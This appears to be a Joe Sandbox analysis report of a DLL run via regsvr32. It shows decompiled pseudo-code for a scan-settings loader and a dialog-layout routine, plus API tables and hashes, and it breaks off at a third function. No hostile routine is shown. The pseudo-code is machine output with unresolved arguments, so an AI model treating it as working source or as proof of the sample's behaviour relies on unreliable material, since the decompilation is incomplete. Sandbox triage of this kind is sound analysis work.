                                                                                                                			E10010570(void* __ecx, void* __edx, void* __eflags) {
				int _v4;
				char _v12;
				char _v16;
				char _v24;
				char _v28;
				char _v44;
				long* _v80;
				long* _v84;
				long* _v88;
				signed int _v100;
				intOrPtr _v104;
				char _v108;
				char _v112;
				struct HWND__* _v124;
				intOrPtr _v136;
				char _v140;
				char _v148;
				char _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t134;
				void* _t138;
				intOrPtr* _t141;
				intOrPtr* _t145;
				void* _t151;
				long _t152;
				intOrPtr* _t158;
				intOrPtr* _t172;
				void* _t173;
				signed int _t176;
				void* _t182;
				long _t196;
				void* _t198;
				intOrPtr _t203;
				intOrPtr* _t207;
				long* _t208;
				long* _t209;
				long* _t210;
				long* _t211;
				void* _t236;
				intOrPtr* _t242;
				long _t282;
				void* _t283;
				long* _t288;
				signed int _t301;
				struct HWND__* _t307;
				void* _t321;
				void* _t331;
				void* _t339;
				void* _t359;
				intOrPtr* _t363;

				_t343 = __eflags;
				_push(0xffffffff);
				_push(E10052030);
				_push( *[fs:0x0]);
				_push(_t236);
				_push(_t321);
				_t134 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t134 ^ _t339 - 0x00000064);
				 *[fs:0x0] =  &_v12;
				_t331 = __ecx;
				E100205E2( &_v100, __eflags);
				_push(0);
				_push(0x40);
				_push("Setting\\ScanSet.dat");
				_v4 = 0;
				_t138 = E10020A24( &_v100, __edx, _t343);
				_t344 = _t138;
				if(_t138 == 0) {
					 *(_t331 + 0x264) = 0;
					 *((intOrPtr*)(_t331 + 0x268)) = 0;
					 *(_t331 + 0x26c) = 1;
					 *(_t331 + 0x270) = 1;
					 *(_t331 + 0x274) = 1;
					L23:
					_t242 = _t331 + 0x284;
					 *((intOrPtr*)(_t242 + 4)) = 0;
					_t301 =  &_v124;
					 *_t242 = 0;
					_t141 = E1000E820(_t242, _t301, _t301, 0x10058760);
					_t237 = _t331 + 0x454;
					_v24 = 2;
					E1001D2C4(_t331 + 0x454,  *_t141);
					_t145 = _v136 + 0xfffffff0;
					_v28 = 0;
					asm("lock xadd [ecx], edx");
					if((_t301 | 0xffffffff) - 1 <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t145)) + 4))))(_t145);
					}
					_t322 = _t331 + 0x358;
					E1001D270(_t331 + 0x358, 0, 1, 0);
					E1001D270(_t331 + 0x358, 0, 4, 0);
					E1001D270(_t331 + 0x358, 0, 8, 0);
					E1001D270(_t331 + 0x358, 0, 0x8000, 0);
					SendMessageA( *(_t331 + 0x378), 0x1036, 0, 1);
					_t151 = E1002AC91(_t322);
					_t304 =  *(_t151 + 0x20);
					_t152 = SendMessageA( *(_t151 + 0x20), 0x1200, 0, 0);
					if(_t152 <= 0) {
						L28:
						SendMessageA( *(_t331 + 0x378), 0x1009, 0, 0);
						E1002650F(_t322, 0, 0x10058800, 0, 0x64, 0xffffffff);
						E1002650F(_t322, 1, 0x100587f8, 0, 0x64, 0xffffffff);
						E1002650F(_t322, 2, 0x100587ec, 0, 0x64, 0xffffffff);
						E1001D35E(_t322, 5);
						 *((intOrPtr*)(_t331 + 0x10e8)) = 0;
						 *((intOrPtr*)(_t331 + 0x10ec)) = 0;
						 *((intOrPtr*)(_t331 + 0x10f0)) = 0;
						_t158 = E100173A6();
						_t363 = _t158;
						_t257 = 0 | _t363 == 0x00000000;
						if(_t363 == 0) {
							_t158 = E10001000(_t257, _t304, 0x80004005);
						}
						_v124 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0xc))))() + 0x10;
						_push( *((intOrPtr*)(_t331 + 0x10f0)));
						_push( *((intOrPtr*)(_t331 + 0x10ec)));
						_v16 = 3;
						E10003500( &_v124, 0x1005873c,  *((intOrPtr*)(_t331 + 0x10e8)));
						_t307 = _v124;
						E1001D2C4(_t331 + 0x304, _t307);
						E1001D35E(_t331 + 0x304, 5);
						E1001D35E(_t237, 5);
						_t325 = IsWindowVisible;
						if(IsWindowVisible( *(_t331 + 0x570)) == 0) {
							__eflags = IsWindowVisible( *(_t331 + 0x2d0));
							if(__eflags == 0) {
								goto L58;
							}
							_t176 = SendMessageA( *(_t331 + 0x2d0), 0x1042, 0, 0);
							__eflags = _t176 - 6;
							if(_t176 > 6) {
								E10018B24(_t331, 0x100587c4, 0, 0);
								goto L58;
							}
							switch( *((intOrPtr*)(_t176 * 4 +  &M10010B94))) {
								case 0:
									_push(0);
									_push(0);
									_push(0);
									goto L48;
								case 1:
									_push(0);
									_push(0);
									_push(1);
									goto L48;
								case 2:
									_push(0);
									_push(0);
									_push(2);
									goto L48;
								case 3:
									_push(0);
									_push(0);
									_push(3);
									goto L48;
								case 4:
									_push(0);
									_push(0);
									_push(4);
									goto L48;
								case 5:
									_push(0);
									_push(0);
									_push(5);
									goto L48;
								case 6:
									_push(0);
									_push(0);
									_push(6);
									L48:
									 *((intOrPtr*)(_t331 + 0x294)) = CreateThread(0, 0, E1000F3A0, ??, ??, ??);
									_t180 =  *(_t331 + 0x270);
									__eflags = _t180;
									if(_t180 == 0) {
										_t307 =  *(_t331 + 0x290);
										_push(1);
										_push(_t307);
										goto L55;
									}
									_t192 = _t180 - 1;
									__eflags = _t192;
									if(_t192 == 0) {
										_push(0);
										_push( *(_t331 + 0x290));
										goto L55;
									}
									__eflags = _t192 == 1;
									if(_t192 == 1) {
										_push(0xffffffff);
										_push( *(_t331 + 0x290));
									} else {
										_t307 =  *(_t331 + 0x290);
										_push(0);
										_push(_t307);
									}
									goto L56;
							}
						} else {
							E10001DB0(_t331 + 0x102c, _t307, 0x10056948, 0);
							_t196 = SendMessageA( *(_t331 + 0x570), 0x110a, 0, 0);
							_t307 =  *(_t331 + 0x570);
							_t198 = CreateThread(0, 0, E1000FFB0, SendMessageA(_t307, 0x110a, 4, _t196), 0, 0);
							_t282 =  *(_t331 + 0x270);
							 *(_t331 + 0x290) = _t198;
							if(_t282 == 0) {
								_push(1);
								_push(_t198);
								L55:
								L56:
								SetThreadPriority();
								_t182 = CreateThread(0, 0, 0x1000f2f0, 0, 0, 0);
								 *(_t331 + 0x28c) = _t182;
								SetThreadPriority(_t182, 0);
								_t325 = _t331 + 0x4fc;
								E1001D39A(_t331 + 0x4fc, 1);
								E1001D35E(_t331 + 0x4fc, 5);
								E1001D39A(_t331 + 0x4a8, 0);
								E1001D39A(_t331 + 0x400, 1);
								E1001D39A(_t331 + 0x3ac, 1);
								E10001310( &_v148, "Searching");
								E1001614A( &_v156);
								L58:
								_t172 = _v124 + 0xfffffff0;
								_v16 = 0;
								asm("lock xadd [ecx], edx");
								_t309 = (_t307 | 0xffffffff) - 1;
								_t369 = (_t307 | 0xffffffff) - 1;
								if((_t307 | 0xffffffff) - 1 <= 0) {
									_t309 =  *((intOrPtr*)( *_t172));
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t172)) + 4))))(_t172);
								}
								_v16 = 0xffffffff;
								_t173 = E100206EF(_t237,  &_v112, _t309, _t325, _t331, _t369);
								 *[fs:0x0] = _v24;
								return _t173;
							}
							_t283 = _t282 - 1;
							if(_t283 == 0) {
								_push(0);
								_push(_t198);
								goto L55;
							}
							if(_t283 == 1) {
								_push(0xffffffff);
								_push(_t198);
							} else {
								_push(0);
								_push(_t198);
							}
							goto L56;
						}
					} else {
						_v124 = _t152;
						do {
							SendMessageA( *(_t331 + 0x378), 0x101c, 0, 0);
							_t85 =  &_v124;
							 *_t85 = _v124 - 1;
						} while ( *_t85 != 0);
						goto L28;
					}
				}
				_t203 = _v112;
				_t311 =  *((intOrPtr*)(_t203 + 0x28));
				 *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x28))))(0, 0, 0);
				_push(0);
				_push(0x1000);
				_push(1);
				_push( &_v124);
				E10020058(_t236,  &_v108,  *((intOrPtr*)(_t203 + 0x28)), _t321, _t331, _t344);
				_t345 = _v100 & 0x00000001;
				_v44 = 1;
				if((_v100 & 0x00000001) == 0) {
					_push(_v104);
					_push(4);
					E10020287(_t236, _t311, _t321, _t331, _t345);
				}
				_t207 = _v84;
				_t288 = _v80;
				_t312 = _t207 + 4;
				if(_t207 + 4 > _t288) {
					E1001FADC( &_v124, _t312, _t207 - _t288 + 4);
					_t288 = _v84;
					_t207 = _v88;
				}
				_t313 =  *_t207;
				_t208 = _t207 + 4;
				_t348 = _v100 & 0x00000001;
				 *((intOrPtr*)(_t331 + 0x268)) =  *_t207;
				_v84 = _t208;
				if((_v100 & 0x00000001) == 0) {
					_push(_v104);
					_push(4);
					_t208 = E10020287(_t236, _t313, _t321, _t331, _t348);
				}
				_t27 =  &(_t208[1]); // 0x4
				_t314 = _t27;
				if(_t27 > _t288) {
					E1001FADC( &_v124, _t314, _t208 - _t288 + 4);
					_t288 = _v84;
					_t208 = _v88;
				}
				_t315 =  *_t208;
				_t209 =  &(_t208[1]);
				_t351 = _v100 & 0x00000001;
				 *(_t331 + 0x26c) =  *_t208;
				_v84 = _t209;
				if((_v100 & 0x00000001) == 0) {
					_push(_v104);
					_push(4);
					_t209 = E10020287(_t236, _t315, _t321, _t331, _t351);
				}
				_t37 =  &(_t209[1]); // 0x4
				_t316 = _t37;
				if(_t37 > _t288) {
					E1001FADC( &_v124, _t316, _t209 - _t288 + 4);
					_t288 = _v84;
					_t209 = _v88;
				}
				_t317 =  *_t209;
				_t210 =  &(_t209[1]);
				_t354 = _v100 & 0x00000001;
				 *(_t331 + 0x270) =  *_t209;
				_v84 = _t210;
				if((_v100 & 0x00000001) == 0) {
					_push(_v104);
					_push(4);
					_t210 = E10020287(_t236, _t317, _t321, _t331, _t354);
				}
				_t47 =  &(_t210[1]); // 0x4
				_t318 = _t47;
				if(_t47 > _t288) {
					E1001FADC( &_v124, _t318, _t210 - _t288 + 4);
					_t288 = _v84;
					_t210 = _v88;
				}
				_t319 =  *_t210;
				_t211 =  &(_t210[1]);
				_t357 = _v100 & 0x00000001;
				 *(_t331 + 0x264) =  *_t210;
				_v84 = _t211;
				if((_v100 & 0x00000001) == 0) {
					_push(_v104);
					_push(4);
					_t211 = E10020287(_t236, _t319, _t321, _t331, _t357);
				}
				_t57 =  &(_t211[1]); // 0x4
				_t320 = _t57;
				if(_t57 > _t288) {
					_t359 = _t211 - _t288 + 4;
					E1001FADC( &_v124, _t320, _t211 - _t288 + 4);
					_t211 = _v88;
				}
				 *(_t331 + 0x274) =  *_t211;
				_v84 =  &(_t211[1]);
				E1001FEB3( &_v124, _t359);
				E10020580(_t236,  &_v140);
				_v44 = 0;
				E1002001A(_t236,  &_v124, _t320, _t321, _t331, _t359);
				goto L23;
			}
























































                                                                                                                0x10010570
                                                                                                                0x10010570
                                                                                                                0x10010572
                                                                                                                0x1001057d
                                                                                                                0x10010581
                                                                                                                0x10010584
                                                                                                                0x10010585
                                                                                                                0x1001058c
                                                                                                                0x10010591
                                                                                                                0x10010597
                                                                                                                0x1001059d
                                                                                                                0x100105a4
                                                                                                                0x100105a5
                                                                                                                0x100105a7
                                                                                                                0x100105b0
                                                                                                                0x100105b7
                                                                                                                0x100105bc
                                                                                                                0x100105be
                                                                                                                0x10010760
                                                                                                                0x10010766
                                                                                                                0x1001076c
                                                                                                                0x10010772
                                                                                                                0x10010778
                                                                                                                0x1001077e
                                                                                                                0x10010780
                                                                                                                0x10010786
                                                                                                                0x1001078e
                                                                                                                0x10010795
                                                                                                                0x10010797
                                                                                                                0x1001079e
                                                                                                                0x100107a7
                                                                                                                0x100107af
                                                                                                                0x100107b8
                                                                                                                0x100107bb
                                                                                                                0x100107c9
                                                                                                                0x100107d0
                                                                                                                0x100107da
                                                                                                                0x100107da
                                                                                                                0x100107df
                                                                                                                0x100107e8
                                                                                                                0x100107f3
                                                                                                                0x100107fe
                                                                                                                0x1001080c
                                                                                                                0x10010826
                                                                                                                0x1001082a
                                                                                                                0x1001082f
                                                                                                                0x1001083c
                                                                                                                0x10010840
                                                                                                                0x1001085f
                                                                                                                0x1001086f
                                                                                                                0x10010880
                                                                                                                0x10010894
                                                                                                                0x100108a8
                                                                                                                0x100108b1
                                                                                                                0x100108b8
                                                                                                                0x100108be
                                                                                                                0x100108c4
                                                                                                                0x100108ca
                                                                                                                0x100108d1
                                                                                                                0x100108d3
                                                                                                                0x100108d8
                                                                                                                0x100108df
                                                                                                                0x100108df
                                                                                                                0x100108f0
                                                                                                                0x10010906
                                                                                                                0x10010907
                                                                                                                0x10010913
                                                                                                                0x1001091b
                                                                                                                0x10010920
                                                                                                                0x10010930
                                                                                                                0x10010939
                                                                                                                0x10010942
                                                                                                                0x1001094d
                                                                                                                0x10010958
                                                                                                                0x100109f3
                                                                                                                0x100109f5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a0b
                                                                                                                0x10010a0d
                                                                                                                0x10010a10
                                                                                                                0x10010b3d
                                                                                                                0x00000000
                                                                                                                0x10010b3d
                                                                                                                0x10010a16
                                                                                                                0x00000000
                                                                                                                0x10010a1d
                                                                                                                0x10010a1f
                                                                                                                0x10010a21
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a25
                                                                                                                0x10010a27
                                                                                                                0x10010a29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a2d
                                                                                                                0x10010a2f
                                                                                                                0x10010a31
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a35
                                                                                                                0x10010a37
                                                                                                                0x10010a39
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a3d
                                                                                                                0x10010a3f
                                                                                                                0x10010a41
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a45
                                                                                                                0x10010a47
                                                                                                                0x10010a49
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010a4d
                                                                                                                0x10010a4f
                                                                                                                0x10010a51
                                                                                                                0x10010a53
                                                                                                                0x10010a64
                                                                                                                0x10010a70
                                                                                                                0x10010a70
                                                                                                                0x10010a73
                                                                                                                0x10010aa6
                                                                                                                0x10010aac
                                                                                                                0x10010aae
                                                                                                                0x00000000
                                                                                                                0x10010aae
                                                                                                                0x10010a75
                                                                                                                0x10010a75
                                                                                                                0x10010a78
                                                                                                                0x10010aa1
                                                                                                                0x10010aa3
                                                                                                                0x00000000
                                                                                                                0x10010aa3
                                                                                                                0x10010a7a
                                                                                                                0x10010a83
                                                                                                                0x10010a96
                                                                                                                0x10010a98
                                                                                                                0x10010a85
                                                                                                                0x10010a85
                                                                                                                0x10010a8b
                                                                                                                0x10010a8d
                                                                                                                0x10010a8d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001095e
                                                                                                                0x1001096b
                                                                                                                0x10010980
                                                                                                                0x10010982
                                                                                                                0x100109a7
                                                                                                                0x100109af
                                                                                                                0x100109b2
                                                                                                                0x100109b8
                                                                                                                0x100109e2
                                                                                                                0x100109e4
                                                                                                                0x10010aaf
                                                                                                                0x10010ab5
                                                                                                                0x10010ab5
                                                                                                                0x10010ac6
                                                                                                                0x10010acb
                                                                                                                0x10010ad1
                                                                                                                0x10010ad3
                                                                                                                0x10010add
                                                                                                                0x10010ae6
                                                                                                                0x10010af3
                                                                                                                0x10010b00
                                                                                                                0x10010b0d
                                                                                                                0x10010b22
                                                                                                                0x10010b2b
                                                                                                                0x10010b42
                                                                                                                0x10010b46
                                                                                                                0x10010b49
                                                                                                                0x10010b57
                                                                                                                0x10010b5b
                                                                                                                0x10010b5c
                                                                                                                0x10010b5e
                                                                                                                0x10010b62
                                                                                                                0x10010b68
                                                                                                                0x10010b68
                                                                                                                0x10010b6e
                                                                                                                0x10010b79
                                                                                                                0x10010b82
                                                                                                                0x10010b91
                                                                                                                0x10010b91
                                                                                                                0x100109ba
                                                                                                                0x100109bd
                                                                                                                0x100109da
                                                                                                                0x100109dc
                                                                                                                0x00000000
                                                                                                                0x100109dc
                                                                                                                0x100109c8
                                                                                                                0x100109d2
                                                                                                                0x100109d4
                                                                                                                0x100109ca
                                                                                                                0x100109ca
                                                                                                                0x100109cc
                                                                                                                0x100109cc
                                                                                                                0x00000000
                                                                                                                0x100109c8
                                                                                                                0x10010842
                                                                                                                0x10010842
                                                                                                                0x10010846
                                                                                                                0x10010856
                                                                                                                0x10010858
                                                                                                                0x10010858
                                                                                                                0x10010858
                                                                                                                0x00000000
                                                                                                                0x10010846
                                                                                                                0x10010840
                                                                                                                0x100105c4
                                                                                                                0x100105c8
                                                                                                                0x100105d2
                                                                                                                0x100105d4
                                                                                                                0x100105d5
                                                                                                                0x100105da
                                                                                                                0x100105e0
                                                                                                                0x100105e5
                                                                                                                0x100105ea
                                                                                                                0x100105ef
                                                                                                                0x100105f7
                                                                                                                0x100105fd
                                                                                                                0x100105fe
                                                                                                                0x10010600
                                                                                                                0x10010600
                                                                                                                0x10010605
                                                                                                                0x10010609
                                                                                                                0x1001060d
                                                                                                                0x10010612
                                                                                                                0x1001061e
                                                                                                                0x10010623
                                                                                                                0x10010627
                                                                                                                0x10010627
                                                                                                                0x1001062b
                                                                                                                0x1001062d
                                                                                                                0x10010630
                                                                                                                0x10010635
                                                                                                                0x1001063b
                                                                                                                0x1001063f
                                                                                                                0x10010645
                                                                                                                0x10010646
                                                                                                                0x10010648
                                                                                                                0x10010648
                                                                                                                0x1001064d
                                                                                                                0x1001064d
                                                                                                                0x10010652
                                                                                                                0x1001065e
                                                                                                                0x10010663
                                                                                                                0x10010667
                                                                                                                0x10010667
                                                                                                                0x1001066b
                                                                                                                0x1001066d
                                                                                                                0x10010670
                                                                                                                0x10010675
                                                                                                                0x1001067b
                                                                                                                0x1001067f
                                                                                                                0x10010685
                                                                                                                0x10010686
                                                                                                                0x10010688
                                                                                                                0x10010688
                                                                                                                0x1001068d
                                                                                                                0x1001068d
                                                                                                                0x10010692
                                                                                                                0x1001069e
                                                                                                                0x100106a3
                                                                                                                0x100106a7
                                                                                                                0x100106a7
                                                                                                                0x100106ab
                                                                                                                0x100106ad
                                                                                                                0x100106b0
                                                                                                                0x100106b5
                                                                                                                0x100106bb
                                                                                                                0x100106bf
                                                                                                                0x100106c5
                                                                                                                0x100106c6
                                                                                                                0x100106c8
                                                                                                                0x100106c8
                                                                                                                0x100106cd
                                                                                                                0x100106cd
                                                                                                                0x100106d2
                                                                                                                0x100106de
                                                                                                                0x100106e3
                                                                                                                0x100106e7
                                                                                                                0x100106e7
                                                                                                                0x100106eb
                                                                                                                0x100106ed
                                                                                                                0x100106f0
                                                                                                                0x100106f5
                                                                                                                0x100106fb
                                                                                                                0x100106ff
                                                                                                                0x10010705
                                                                                                                0x10010706
                                                                                                                0x10010708
                                                                                                                0x10010708
                                                                                                                0x1001070d
                                                                                                                0x1001070d
                                                                                                                0x10010712
                                                                                                                0x10010716
                                                                                                                0x1001071e
                                                                                                                0x10010723
                                                                                                                0x10010723
                                                                                                                0x10010729
                                                                                                                0x10010736
                                                                                                                0x1001073a
                                                                                                                0x10010743
                                                                                                                0x1001074c
                                                                                                                0x10010754
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10020A24: lstrlenA.KERNEL32(?,?,?,00000000), ref: 10020A81
                                                                                                                • SendMessageA.USER32 ref: 10010826
                                                                                                                • SendMessageA.USER32 ref: 1001083C
                                                                                                                • SendMessageA.USER32 ref: 10010856
                                                                                                                • SendMessageA.USER32 ref: 1001086F
                                                                                                                  • Part of subcall function 10020058: __EH_prolog3.LIBCMT ref: 1002005F
                                                                                                                  • Part of subcall function 10020287: __EH_prolog3.LIBCMT ref: 1002028E
                                                                                                                  • Part of subcall function 10020287: __CxxThrowException@8.LIBCMT ref: 100202C4
                                                                                                                  • Part of subcall function 1002001A: __EH_prolog3.LIBCMT ref: 10020021
                                                                                                                  • Part of subcall function 1002650F: SendMessageA.USER32 ref: 10026558
                                                                                                                  • Part of subcall function 1001D35E: ShowWindow.USER32(?,?), ref: 1001D36B
                                                                                                                • IsWindowVisible.USER32(?), ref: 10010954
                                                                                                                • SendMessageA.USER32 ref: 10010980
                                                                                                                • SendMessageA.USER32 ref: 10010991
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000FFB0,00000000,00000000,00000000), ref: 100109A7
                                                                                                                • SetThreadPriority.KERNEL32(?,00000001), ref: 10010AB5
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,1000F2F0,00000000,00000000,00000000), ref: 10010AC6
                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000), ref: 10010AD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Thread$H_prolog3$CreatePriorityWindow$Exception@8ShowThrowVisiblelstrlen
                                                                                                                • String ID: Searching$Setting\ScanSet.dat
                                                                                                                • API String ID: 2124478951-365256678
                                                                                                                • Opcode ID: 690367f24c0ce8a48474270274093a9fee1c207101ca0c2174ac5d4b342acbf3
                                                                                                                • Instruction ID: dec44e09df43663d398fd34b81c8922999eac6ca1bf05e88d62e9de328a498c8
                                                                                                                • Opcode Fuzzy Hash: 690367f24c0ce8a48474270274093a9fee1c207101ca0c2174ac5d4b342acbf3
                                                                                                                • Instruction Fuzzy Hash: 4D029F71344701ABE224DB64CC82FABB7E5EF84744F10460CF69AAB2D1DBB1F9458B15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002B6AB Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1002B6AB(void* __ecx, void* __edx) {
				int _v8;
				struct HWND__* _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				struct HWND__* _t75;
				struct HWND__* _t86;
				intOrPtr _t92;
				struct HWND__* _t99;
				void* _t117;
				void* _t118;
				struct HWND__* _t119;
				void* _t131;
				void* _t133;
				void* _t142;

				_t131 = __edx;
				_t133 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xa4)) == 0 && GetDlgItem( *(__ecx + 0x20), 0x3020) != 0) {
					E10017DA9(_t114, 0x200, 0, 0);
				}
				_t117 = GetWindowRect;
				if(( *(_t133 + 0x58) & 0x01000020) == 0) {
					_t86 = GetDlgItem( *(_t133 + 0x20), 0x3020);
					_v12 = _t86;
					GetWindowRect(_t86,  &_v32);
					E10024274(_t133,  &_v32);
					_v48.left = 0;
					_v48.top = 0;
					_v48.right = 0;
					_v48.bottom = 0x20;
					MapDialogRect( *(_t133 + 0x20),  &_v48);
					_t92 = _v32.bottom;
					if(_v48.bottom < _t92) {
						_v16 = _t92 - _v32.top - _v48.bottom;
						SetWindowPos(_v12, 0, 0, 0, _v32.right - _v32.left, _v48.bottom, 0x16);
						_v8 = 0;
						do {
							_t99 = GetDlgItem( *(_t133 + 0x20),  *(_v8 + 0x1006d5e8));
							_v12 = _t99;
							if(_t99 != 0) {
								GetWindowRect(_t99,  &_v32);
								E10024274(_t133,  &_v32);
								SetWindowPos(_v12, 0, _v32.left, _v32.top - _v16, 0, 0, 0x15);
							}
							_v8 = _v8 + 4;
						} while (_v8 < 0x10);
						GetWindowRect( *(_t133 + 0x20),  &_v32);
						_t142 = _v32.right - _v32.left;
						E1001D569(_t133, 0, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top - _v16, 0x16);
					}
				}
				_v16 = E10019B72(_t117, _t133, 0, _t142);
				if( *((intOrPtr*)(_t133 + 0xa8)) != 0 && ( *(_t133 + 0x58) & 0x01000020) == 0) {
					GetWindowRect( *(_t133 + 0x20),  &_v48);
					_t75 = GetDlgItem( *(_t133 + 0x20), 1);
					if(_t75 != 0) {
						GetWindowRect(_t75,  &_v32);
						E1001D569(_t133, 0, 0, 0, _v48.right - _v48.left, _v32.top - _v48.top, 0x16);
					}
					_v8 = 0;
					do {
						_t119 = GetDlgItem( *(_t133 + 0x20),  *(_v8 + 0x1006d5e8));
						if(_t119 != 0) {
							ShowWindow(_t119, 0);
							EnableWindow(_t119, 0);
						}
						_v8 = _v8 + 4;
					} while (_v8 < 0x10);
				}
				_t70 = E1001D23C(_t133);
				_pop(_t118);
				if((_t70 & 0x40000000) == 0) {
					E100195F7(_t118, _t133, _t131, 0);
				}
				return _v16;
			}






















                                                                                                                0x1002b6ab
                                                                                                                0x1002b6b3
                                                                                                                0x1002b6bd
                                                                                                                0x1002b6d9
                                                                                                                0x1002b6d9
                                                                                                                0x1002b6e6
                                                                                                                0x1002b6ec
                                                                                                                0x1002b6fa
                                                                                                                0x1002b705
                                                                                                                0x1002b708
                                                                                                                0x1002b710
                                                                                                                0x1002b71c
                                                                                                                0x1002b71f
                                                                                                                0x1002b722
                                                                                                                0x1002b725
                                                                                                                0x1002b72c
                                                                                                                0x1002b732
                                                                                                                0x1002b738
                                                                                                                0x1002b749
                                                                                                                0x1002b759
                                                                                                                0x1002b75f
                                                                                                                0x1002b762
                                                                                                                0x1002b76e
                                                                                                                0x1002b776
                                                                                                                0x1002b779
                                                                                                                0x1002b780
                                                                                                                0x1002b788
                                                                                                                0x1002b79f
                                                                                                                0x1002b79f
                                                                                                                0x1002b7a5
                                                                                                                0x1002b7a9
                                                                                                                0x1002b7b6
                                                                                                                0x1002b7c9
                                                                                                                0x1002b7d0
                                                                                                                0x1002b7d0
                                                                                                                0x1002b738
                                                                                                                0x1002b7e2
                                                                                                                0x1002b7e5
                                                                                                                0x1002b7f7
                                                                                                                0x1002b7fe
                                                                                                                0x1002b806
                                                                                                                0x1002b80d
                                                                                                                0x1002b824
                                                                                                                0x1002b824
                                                                                                                0x1002b829
                                                                                                                0x1002b82c
                                                                                                                0x1002b83e
                                                                                                                0x1002b842
                                                                                                                0x1002b846
                                                                                                                0x1002b84e
                                                                                                                0x1002b84e
                                                                                                                0x1002b854
                                                                                                                0x1002b858
                                                                                                                0x1002b82c
                                                                                                                0x1002b860
                                                                                                                0x1002b86a
                                                                                                                0x1002b86b
                                                                                                                0x1002b870
                                                                                                                0x1002b870
                                                                                                                0x1002b87b

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00003020), ref: 1002B6C7
                                                                                                                • GetDlgItem.USER32(?,00003020), ref: 1002B6FA
                                                                                                                • GetWindowRect.USER32 ref: 1002B708
                                                                                                                • MapDialogRect.USER32(?,?), ref: 1002B72C
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000020,00000016), ref: 1002B759
                                                                                                                • GetDlgItem.USER32(00000020,?), ref: 1002B76E
                                                                                                                • GetWindowRect.USER32 ref: 1002B780
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 1002B79F
                                                                                                                • GetWindowRect.USER32 ref: 1002B7B6
                                                                                                                • GetWindowRect.USER32 ref: 1002B7F7
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 1002B7FE
                                                                                                                • GetWindowRect.USER32 ref: 1002B80D
                                                                                                                • GetDlgItem.USER32(?,?), ref: 1002B838
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 1002B846
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1002B84E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Item$DialogEnableShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 763981185-3916222277
                                                                                                                • Opcode ID: f51054db1346af9c0a42a6bc3f4aa064ca6629e0ca86298902cef89b362c1939
                                                                                                                • Instruction ID: a5a35e27e5f5d6e8fa5b1653bb3fae5833f6c0cc24fded47811104412f164aaa
                                                                                                                • Opcode Fuzzy Hash: f51054db1346af9c0a42a6bc3f4aa064ca6629e0ca86298902cef89b362c1939
                                                                                                                • Instruction Fuzzy Hash: B8510371A00649EFDF11DFA9DD89DAFBBB9FF88740F404119F106A2165EB74AA40DB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100174A2 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E100174A2() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
